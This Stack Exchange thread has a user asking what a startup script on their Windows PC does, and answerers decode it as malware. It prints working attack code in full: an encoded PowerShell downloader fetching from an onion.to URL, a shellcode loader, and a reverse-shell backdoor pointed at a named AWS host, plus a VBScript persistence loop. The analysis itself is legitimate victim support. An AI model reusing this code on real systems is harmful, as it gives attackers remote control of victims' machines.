72

A piece of code was running on my Windows machine at startup. I would like to know exactly what this code is doing; it seems to refer to something like crackbook?

@echo off  
if %PROCESSOR_ARCHITECTURE%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) 
if %PROCESSOR_ARCHITECTURE%==AMD64( START /B %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )

EDIT: I tried formatting my PC. It seems like a spyware from prpops.com (NSFW) is installed on my system without any notice.

The config file which used to start on my PC is still there even after I formatted my PC. Here is a little code that it runs through which above bat file used to run.

Dim WinScriptHost 
WScript.Sleep(30000) 
Set WinScriptHost = CreateObject("WScript.Shell") 
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
While True 
set service = GetObject ("winmgmts:") 
running = 0 
for each Process in Service.InstancesOf ("Win32_Process") 
    If Process.Name = "powershell.exe" then 
        running = running + 1 
        End If 
next 
If running < 1 then 
    WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
    End If 
WScript.Sleep(120000) 
Wend 
Set WinScriptHost = Nothing 

Please tell if this auto-downloads the script or stores it in any way in memory?

Aditya Giri
  • 739
  • 1
  • 5
  • 8
  • 11
    That startup script is downloading (potential) malware from an onion (Tor network) site that's not currently available. – Arminius May 25 '17 at 17:10
  • 8
    If the answers are correct in that arbitrary and unknown PowerShell scripts are run on your computer from a remote server, it is pretty easy to presume at this point that pretty much anything could have been run, including other executable admin/privilege escalation exploits. Sounds like a nuke from orbit sort of situation to me, change your passwords, etc. At this point I don't think it's even possible to know what was downloaded and run, as the site is already gone. I don't think anyone can guess what sort of other nastiness could have been executed. – BrianH May 26 '17 at 22:18
  • 14
    Just curious, but how did you discover that it was running on startup? – You'reAGitForNotUsingGit May 27 '17 at 10:32
  • 6
    I wanted to see which apps were draining my battery so fast at startup. I saw a program named config. I digged into the code to see what was going on. I got to `file.bat` which is present. I thought it was doing something malicious and ended up here getting wonderful response from community. – Aditya Giri May 27 '17 at 15:43
  • Wait! you formatted your pc and it is still there?? where did you get your installation media? – giammin May 31 '17 at 10:42

3 Answers3

107

Short version

The attacker is able to run any PowerShell commands on your machine and can be found by getting the owner of "ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com".

Long version

I dumped the binary array into a file and uploaded it to VirusTotal.

The newly launched file seems like an additional stage to me since it is really small (1.7 kb) and will be executed for 10 seconds only since it will be bound to PowerShell (since the attacker creates a thread instead of launching it as a separate process) and the termination is delayed by 10 secs at the last command.

Update: I'm sadly unable to reverse-engineer assembly, but a quick look at the file using a text editor revealed the following string:

powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(
'A really long base64 full code can be found below'));
IEX (New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();)

However, this stage also utilities GZIP as an additional obfuscation layer to Base64, but still can be dumped to:

# Powerfun - Written by Ben Turner & Dave Hardy

function Get-Webclient 
{
    $wc = New-Object -TypeName Net.WebClient
    $wc.UseDefaultCredentials = $true
    $wc.Proxy.Credentials = $wc.Credentials
    $wc
}
function powerfun 
{ 
    Param( 
    [String]$Command,
    [String]$Sslcon,
    [String]$Download
    ) 
    Process {
    $modules = @()  
    if ($Command -eq "bind")
    {
        $listener = [System.Net.Sockets.TcpListener]9999
        $listener.start()    
        $client = $listener.AcceptTcpClient()
    } 
    if ($Command -eq "reverse")
    {
    $client = New-Object  System.Net.Sockets.TCPClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com",9999)
    }

    $stream = $client.GetStream()

    if ($Sslcon -eq "true") 
    {
        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
        $sslStream.AuthenticateAsClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com") 
        $stream = $sslStream 
    }

    [byte[]]$bytes = 0..20000|%{0}
    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
    $stream.Write($sendbytes,0,$sendbytes.Length)

    if ($Download -eq "true")
    {
        $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)
        ForEach ($module in $modules)
        {
            (Get-Webclient).DownloadString($module)|Invoke-Expression
        }
    }

    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
    $stream.Write($sendbytes,0,$sendbytes.Length)

    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {
        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
        $data = $EncodedText.GetString($bytes,0, $i)
        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
        $x = ($error[0] | Out-String)
        $error.clear()
        $sendback2 = $sendback2 + $x

        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()  
    }
    $client.Close()
    $listener.Stop()
    }
}

powerfun -Command reverse -Sslcon true

This is a rather simple PowerShell backdoor which is connecting to a server and then allows the attacker to remotely run PowerShell commands on your machine. This "powerfun" script can be found on GitHub by googling two seconds so I won't link it here to not stretch the anti-spam limits. However, by comparing it to the original script, you'll quickly notice that the attacker changed the remote server address to "ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com" and the port to 9999, so it should be easy to track the attacker if needed.

Finally: The server is still listening to that port, so the attacker is able to control your computer!

VincBreaker
  • 881
  • 1
  • 6
  • 13
  • nice, I was just about to update my answer, as I finally took the time to do this last decoding steps :) And yes, the attacker might still have control over the OP's computer – mdeous May 25 '17 at 21:16
  • 3
    I didn't mention it in the answer, but you are able to connect to the IP and port given in the backdoor's code. Since 9999 is a rather unusual port, I think it's still the attacker listening for targets. – VincBreaker May 25 '17 at 21:34
  • 54
    Can we report this to the amazon AWS team somehow that their service is being abused to do this? – cat May 25 '17 at 23:39
  • Should I reset my PC to remove this behavior? – Aditya Giri May 26 '17 at 03:14
  • 3
    @Aditya Giri That depends on the persitence of the virus which may or may not be the autostart script only, but also could be the downloaded executable which I higly doubt since it is kept in RAM and not saved on your hard-drive, but since I can't tell what the executable really does, there is a chance it will autostart itself too. I the other case, just removing the first stage from autostart and rebooting should be fine. :) – VincBreaker May 26 '17 at 09:00
  • 1
    @Aditya if by reset you mean reinstall from scratch and restore from backups, then yes. You shouldn't trust anything in that system. I'm not sure I understand Vinc's last comment, but just removing the autostart is not fine. – GnP May 27 '17 at 03:16
  • Hey, can you check the edit? – Aditya Giri May 27 '17 at 08:54
  • @AdityaGiri It basicly launches "%USERPROFILE%\appdata\file.bat", checks weather powershell is running and launches the batch again in the case powershell is not running, we need the batch file to further analyse the potential malware. – VincBreaker May 27 '17 at 09:16
  • Batch files content are provided above before. – Aditya Giri May 27 '17 at 09:17
  • @AdityaGiri No, there is another batch file located at %USERPROFILE%\appdata\file.bat , this is the file we need. – VincBreaker May 27 '17 at 09:19
  • Contents of that file have been provided already. I was digging to see what the code was. Then I got to that file. When I reset my PC, this was still there so I decided to put up `config` file too. There are no other files associated with this. – Aditya Giri May 27 '17 at 09:22
  • 1
    So the file.bat is the file we already analysed and the script you just added was the actually autostarted program? However, the script is not able to download any file, it just tries to launch the file.bat, checks weather powershell is running and launches the file.bat again if powershell is not running. – VincBreaker May 27 '17 at 09:29
  • 13
    @cat https://aws.amazon.com/forms/report-abuse – Braiam May 27 '17 at 13:46
  • 5
    So I wrote a simple Node.js script to connect and echo any commands given to it. You can find it [here](https://gist.github.com/Qix-/3c8a619abdaf35b0dd1e27efafb86e2f). I've been listening and so far no commands have been issued. Looks like a really cheap botnet over AWS. They should _really_ investigate this. – Qix - MONICA WAS MISTREATED May 28 '17 at 03:23
43

Short version

Your machine is compromised and the attacker still controls your computer.

Long version

By decoding the base64 encoded expression (the string passed in the -Enc argument), you obtain the code that is executed by PowerShell:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

This code basically downloads some more PowerShell code from a Tor hidden-service (through the onion.to gateway, which allows to access Tor hidden services from a machine which isn't connected to Tor) and executes it.

Here is the code that is downloaded and executed (once again, inline execution of a base64 encoded PowerShell script):

powershell -Enc [long base64 encoded string]

Which corresponds to the following code once decoded:

$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x = $o::VirtualAlloc(0, 0x1000, 0x3000, 0x40)
[Byte[]]$sc = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x70,0x6f,0x77,0x65,0x72,0x73,0x68,0x65,0x6c,0x6c,0x2e,0x65,0x78,0x65,0x20,0x2d,0x65,0x78,0x65,0x63,0x20,0x62,0x79,0x70,0x61,0x73,0x73,0x20,0x2d,0x6e,0x6f,0x70,0x20,0x2d,0x57,0x20,0x68,0x69,0x64,0x64,0x65,0x6e,0x20,0x2d,0x6e,0x6f,0x6e,0x69,0x6e,0x74,0x65,0x72,0x61,0x63,0x74,0x69,0x76,0x65,0x20,0x49,0x45,0x58,0x20,0x24,0x28,0x24,0x73,0x3d,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x2c,0x5b,0x43,0x6f,0x6e,0x76,0x65,0x72,0x74,0x5d,0x3a,0x3a,0x46,0x72,0x6f,0x6d,0x42,0x61,0x73,0x65,0x36,0x34,0x53,0x74,0x72,0x69,0x6e,0x67,0x28,0x27,0x48,0x34,0x73,0x49,0x41,0x49,0x76,0x6d,0x79,0x56,0x67,0x43,0x41,0x36,0x56,0x57,0x62,0x57,0x2f,0x62,0x4e,0x68,0x44,0x2b,0x37,0x6c,0x39,0x78,0x63,0x4c,0x56,0x61,0x51,0x69,0x7a,0x43,0x4e,0x70,0x70,0x68,0x44,0x5a,0x42,0x69,0x72,0x70,0x4a,0x75,0x41,0x62,0x4c,0x57,0x71,0x4c,0x33,0x6c,0x67,0x32,0x45,0x67,0x74,0x48,0x53,0x4f,0x74,0x55,0x69,0x6b,0x53,0x31,0x4a,0x2b,0x57,0x65,0x4c,0x2f,0x58,0x6c,0x4b,0x69,0x58,0x68,0x77,0x6e,0x36,0x4c,0x4c,0x70,0x69,0x36,0x33,0x6a,0x33,0x63,0x50,0x6e,0x6e,0x6a,0x73,0x65,0x39,0x51,0x5a,0x47,0x66,0x49,0x4e,0x69,0x6b,0x54,0x48,0x77,0x34,0x55,0x62,0x45,0x53,0x69,0x47,0x44,0x2b,0x51,0x34,0x2b,0x36,0x70,0x39,0x4a,0x4a,0x68,0x67,0x4b,0x65,0x41,0x73,0x58,0x64,0x49,0x33,0x77,0x4f,0x78,0x58,0x52,0x72,0x74,0x58,0x53,0x6e,0x71,0x47,0x4b,0x4f,0x59,0x50,0x66,0x55,0x50,0x6b,0x33,0x4f,0x41,0x2b,0x54,0x47,0x4a,0x6d,0x43,0x31,0x6b,0x4d,0x4c,0x39,0x4f,0x4e,0x73,0x51,0x6a,0x69,0x48,0x7a,0x37,0x6a,0x78,0x76,0x38,0x7a,0x2f,0x78,0x6c,0x43,0x42,0x50,0x39,0x6d,0x74,0x38,0x44,0x4e,0x4e,0x55,0x52,0x73,0x56,0x30,0x66,0x35,0x42,0x37,0x6c,0x38,0x36,0x6b,0x7a,0x38,0x6c,0x58,0x75,0x43,0x43,0x5a,0x6f,0x6b,0x4b,0x42,0x45,0x5a,0x36,0x4a,0x61,0x61,0x4a,0x31,0x42,0x43,0x4f,0x45,0x68,0x6c,0x57,0x58,0x69,0x50,0x42,0x74,0x7a,0x76,0x79,0x78,0x45,0x50,0x62,0x47,0x35,0x62,0x53,0x74,0x37,0x57,0x76,0x4b,0x61,0x37,0x4b,0x31,0x46,0x6f,0x50,0x6b,0x4b,0x2b,0x50,0x71,0x4b,0x43,0x70,0x57,0x2f,0x79,0x66,0x6a,0x70,0x57,0x49,0x32,0x64,0x33,0x4d,0x43,0x58,0x69,0x61,0x55,0x68,0x5a,0x31,0x44,0x36,0x31,0x6a,0x6d,0x59,0x53,0x63,0x50,0x54,0x46,0x65,0x38,0x41,0x31,0x4c,0x4f,0x49,0x31,0x79,0x71,0x32,0x63,0x78,0x42,0x51,0x39,0x52,0x53,0x72,0x41,0x43,0x70,0x44,0x7a,0x4b,0x45,0x6a,0x51,0x45,0x66,0x33,0x55,0x39,0x4b,0x46,0x7a,0x69,0x42,0x62,0x6a,0x6c,0x4e,0x75,0x44,0x6a,0x4e,0x32,0x6a,0x50,0x59,0x78,0x61,0x31,0x76,0x58,0x79,0x78,0x69,0x4d,0x74,0x6a,0x6b,0x31,0x68,0x71,0x2b,0x62,0x58,0x6b,0x35,0x33,0x72,0x4c,0x6e,0x66,0x36,0x66,0x45,0x71,0x50,0x61,0x6d,0x49,0x66,0x33,0x71,0x43,0x53,0x5a,0x68,0x4b,0x74,0x72,0x36,0x7a,0x46,0x37,0x72,0x35,0x2f,0x6a,0x51,0x43,0x49,0x56,0x46,0x63,0x72,0x73,0x61,0x33,0x66,0x4f,0x56,0x32,0x32,0x4a,0x7a,0x68,0x74,0x2b,0x77,0x7a,0x44,0x45,0x6c,0x64,0x4b,0x41,0x52,0x54,0x6e,0x63,0x67,0x73,0x72,0x2b,0x4a,0x62,0x6f,0x43,0x31,0x79,0x67,0x6b,0x48,0x6a,0x4f,0x75,0x6f,0x42,0x73,0x6c,0x66,0x34,0x35,0x35,0x4d,0x4c,0x49,0x62,0x74,0x54,0x45,0x63,0x2b,0x4b,0x66,0x76,0x2f,0x50,0x37,0x50,0x37,0x2f,0x33,0x42,0x75,0x31,0x2f,0x38,0x66,0x75,0x2b,0x55,0x30,0x4a,0x55,0x76,0x65,0x61,0x61,0x57,0x53,0x4b,0x58,0x79,0x2b,0x79,0x54,0x6b,0x36,0x53,0x70,0x54,0x53,0x47,0x68,0x4b,0x2f,0x2b,0x47,0x4d,0x62,0x71,0x53,0x78,0x74,0x4c,0x73,0x6d,0x59,0x30,0x75,0x7a,0x56,0x55,0x67,0x74,0x6c,0x55,0x43,0x61,0x6d,0x72,0x77,0x4b,0x47,0x6b,0x53,0x33,0x35,0x44,0x69,0x33,0x36,0x58,0x7a,0x71,0x54,0x49,0x70,0x4b,0x46,0x6f,0x6d,0x59,0x72,0x6d,0x72,0x62,0x77,0x6a,0x58,0x53,0x6b,0x44,0x49,0x5a,0x6c,0x32,0x41,0x76,0x5a,0x49,0x4a,0x68,0x70,0x6b,0x2f,0x48,0x6a,0x6f,0x78,0x4c,0x56,0x39,0x66,0x75,0x33,0x33,0x55,0x57,0x75,0x76,0x32,0x77,0x36,0x7a,0x34,0x34,0x45,0x34,0x32,0x2b,0x42,0x35,0x39,0x4b,0x6d,0x42,0x37,0x45,0x66,0x4d,0x57,0x55,0x4b,0x77,0x78,0x51,0x71,0x48,0x67,0x52,0x68,0x31,0x54,0x68,0x58,0x7a,0x53,0x4a,0x49,0x32,0x70,0x36,0x4e,0x4b,0x42,0x4a,0x4d,0x71,0x66,0x68,0x2f,0x63,0x7a,0x7a,0x6e,0x71,0x46,0x44,0x68,0x6b,0x59,0x57,0x33,0x65,0x41,0x6d,0x61,0x43,0x6a,0x2f,0x72,0x34,0x5a,0x65,0x6f,0x79,0x6c,0x71,0x38,0x65,0x72,0x6b,0x6d,0x2b,0x70,0x4f,0x35,0x7a,0x75,0x46,0x30,0x39,0x6e,0x4d,0x4d,0x62,0x2b,0x6d,0x6e,0x58,0x75,0x45,0x44,0x48,0x72,0x36,0x65,0x66,0x7a,0x70,0x6f,0x62,0x65,0x33,0x42,0x55,0x41,0x57,0x6c,0x63,0x76,0x75,0x56,0x4f,0x46,0x57,0x45,0x57,0x51,0x68,0x6a,0x38,0x78,0x5a,0x4f,0x54,0x73,0x62,0x6a,0x6f,0x4f,0x72,0x4b,0x38,0x38,0x55,0x35,0x61,0x50,0x78,0x63,0x64,0x73,0x33,0x75,0x75,0x6e,0x35,0x52,0x68,0x59,0x54,0x5a,0x37,0x7a,0x45,0x4a,0x41,0x47,0x52,0x4d,0x61,0x61,0x39,0x51,0x55,0x75,0x57,0x53,0x64,0x33,0x34,0x62,0x54,0x67,0x42,0x42,0x39,0x6e,0x36,0x7a,0x4c,0x77,0x78,0x4d,0x7a,0x5a,0x4f,0x74,0x45,0x31,0x58,0x72,0x31,0x71,0x77,0x6d,0x56,0x57,0x4c,0x74,0x79,0x7a,0x67,0x71,0x35,0x32,0x49,0x37,0x35,0x59,0x4b,0x33,0x4d,0x43,0x44,0x51,0x61,0x39,0x2f,0x43,0x6e,0x2f,0x45,0x6f,0x65,0x43,0x53,0x4c,0x78,0x51,0x45,0x58,0x4b,0x79,0x34,0x79,0x4b,0x55,0x6d,0x4d,0x44,0x51,0x37,0x47,0x6b,0x38,0x4a,0x41,0x76,0x55,0x47,0x61,0x34,0x7a,0x49,0x4c,0x62,0x74,0x6c,0x74,0x71,0x2b,0x74,0x4a,0x73,0x53,0x4d,0x51,0x58,0x54,0x72,0x37,0x4c,0x71,0x39,0x62,0x76,0x31,0x43,0x72,0x70,0x48,0x64,0x71,0x57,0x57,0x7a,0x77,0x63,0x71,0x70,0x30,0x47,0x79,0x78,0x6f,0x77,0x35,0x37,0x6e,0x56,0x54,0x54,0x6b,0x78,0x6c,0x63,0x61,0x30,0x69,0x6a,0x6a,0x5a,0x30,0x6f,0x70,0x4f,0x4c,0x35,0x65,0x71,0x35,0x6c,0x31,0x43,0x63,0x75,0x4c,0x6d,0x6d,0x34,0x31,0x4a,0x77,0x4c,0x55,0x49,0x68,0x5a,0x4e,0x62,0x46,0x71,0x72,0x35,0x71,0x32,0x65,0x64,0x79,0x44,0x51,0x65,0x2b,0x52,0x4d,0x74,0x74,0x69,0x4a,0x70,0x5a,0x49,0x33,0x75,0x4d,0x56,0x57,0x2f,0x4e,0x37,0x39,0x43,0x2b,0x33,0x4b,0x36,0x32,0x74,0x31,0x48,0x70,0x58,0x4b,0x50,0x76,0x44,0x55,0x2f,0x73,0x71,0x4a,0x54,0x71,0x6a,0x4d,0x58,0x52,0x30,0x6e,0x58,0x4d,0x57,0x31,0x7a,0x7a,0x4d,0x4b,0x2b,0x6d,0x52,0x45,0x56,0x56,0x4c,0x62,0x65,0x31,0x38,0x36,0x50,0x7a,0x6e,0x30,0x6d,0x32,0x57,0x63,0x59,0x4b,0x75,0x36,0x38,0x54,0x35,0x47,0x53,0x6a,0x43,0x76,0x79,0x4b,0x4e,0x33,0x4b,0x4c,0x6a,0x75,0x39,0x44,0x72,0x67,0x6e,0x4d,0x51,0x35,0x34,0x48,0x50,0x45,0x48,0x70,0x48,0x74,0x62,0x30,0x30,0x39,0x44,0x47,0x61,0x36,0x46,0x52,0x65,0x75,0x76,0x7a,0x73,0x4a,0x44,0x45,0x75,0x4a,0x45,0x2f,0x78,0x30,0x71,0x5a,0x63,0x6f,0x2b,0x68,0x35,0x51,0x41,0x32,0x56,0x42,0x70,0x6f,0x64,0x61,0x4c,0x6e,0x4d,0x5a,0x54,0x72,0x67,0x78,0x4e,0x36,0x54,0x74,0x74,0x4c,0x6a,0x77,0x32,0x68,0x35,0x56,0x41,0x44,0x77,0x79,0x79,0x46,0x65,0x67,0x41,0x38,0x2b,0x76,0x4f,0x33,0x44,0x49,0x33,0x7a,0x4a,0x6c,0x46,0x2b,0x67,0x67,0x70,0x58,0x69,0x41,0x47,0x6f,0x41,0x75,0x53,0x41,0x6c,0x73,0x42,0x62,0x35,0x42,0x79,0x57,0x41,0x54,0x67,0x32,0x79,0x4e,0x55,0x51,0x63,0x46,0x49,0x4b,0x4c,0x61,0x57,0x39,0x32,0x73,0x46,0x6d,0x44,0x64,0x62,0x35,0x4f,0x77,0x67,0x53,0x70,0x63,0x4c,0x33,0x6e,0x47,0x4a,0x77,0x33,0x58,0x2f,0x54,0x42,0x33,0x37,0x61,0x4f,0x54,0x39,0x4b,0x2f,0x61,0x70,0x38,0x61,0x35,0x6f,0x64,0x48,0x70,0x39,0x6b,0x71,0x52,0x77,0x65,0x6e,0x6a,0x50,0x6d,0x55,0x5a,0x48,0x4a,0x5a,0x33,0x65,0x74,0x32,0x44,0x4e,0x72,0x62,0x4a,0x30,0x69,0x34,0x52,0x4a,0x74,0x50,0x66,0x64,0x4f,0x4f,0x46,0x56,0x2b,0x56,0x31,0x36,0x76,0x2b,0x4e,0x6d,0x6c,0x56,0x33,0x79,0x52,0x56,0x63,0x65,0x7a,0x6c,0x43,0x72,0x36,0x39,0x71,0x4d,0x77,0x41,0x2b,0x51,0x36,0x63,0x4f,0x36,0x39,0x6e,0x6c,0x77,0x6b,0x41,0x41,0x41,0x3d,0x3d,0x27,0x29,0x29,0x3b,0x49,0x45,0x58,0x20,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x53,0x74,0x72,0x65,0x61,0x6d,0x52,0x65,0x61,0x64,0x65,0x72,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x47,0x7a,0x69,0x70,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x24,0x73,0x2c,0x5b,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x4d,0x6f,0x64,0x65,0x5d,0x3a,0x3a,0x44,0x65,0x63,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x29,0x29,0x29,0x2e,0x52,0x65,0x61,0x64,0x54,0x6f,0x45,0x6e,0x64,0x28,0x29,0x3b,0x29,0x00
for ($i=0; $i -le ($sc.Length-1); $i++) {
    $o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null
}
$z = $o::CreateThread(0, 0, $x, 0, 0, 0)
Start-Sleep -Second 100000

From my understanding, this code imports system DLLs and then executes some native code (the long byte array on line 8).

To dig further, one could reconstruct the native code from the byte array and submit it to VirusTotal to try to identify which malware it is, or directly run the PowerShell script in a sandbox to dynamically analyse its behavior.

EDIT: An analysis of this last part is available in VincBreaker's answer.

mdeous
  • 626
  • 4
  • 8
10

It is running a Powershell script with Base64 encoded Powershell code.

This is the decoded Powershell code that is being run:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

So this script is downloading and invoking the content from https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq

I'll let you dig further, as I am wary of navigating to a potentially malicious link. Especially since it is coming from *.onion.to, a TOR address.

SecretSasquatch
  • 619
  • 3
  • 9
  • 8
    Based on that, it's almost certainly something Not Good. The site's gone, but something's been infected by the sounds of it! – Ron Bowes May 25 '17 at 17:19
  • When I tried decoding the Base64, there was a NUL (00000000 binary) between every ASCII character? Why is this? Did I do something wrong? – Azteca May 25 '17 at 18:31
  • @Azteca It's in Unicode (UTF-8) and your editor isn't. – GalacticCowboy May 25 '17 at 20:08
  • @GalacticCowboy I used Chrome Console `atob('QmFzZTY0IHRleHQgaGVyZQ==')`, http://www.rapidtables.com and https://www.base64decode.org/ all of which showed something between every ASCII letter, as if it were UTF16? or just PS skips the nulls (0x00 - bin 00000000) – Azteca May 25 '17 at 20:19
  • 6
    @Azteca My assumption would be that it is, in fact, UTF-16, unless you have some reason to think that it isn't. – Tanner Swett May 25 '17 at 22:41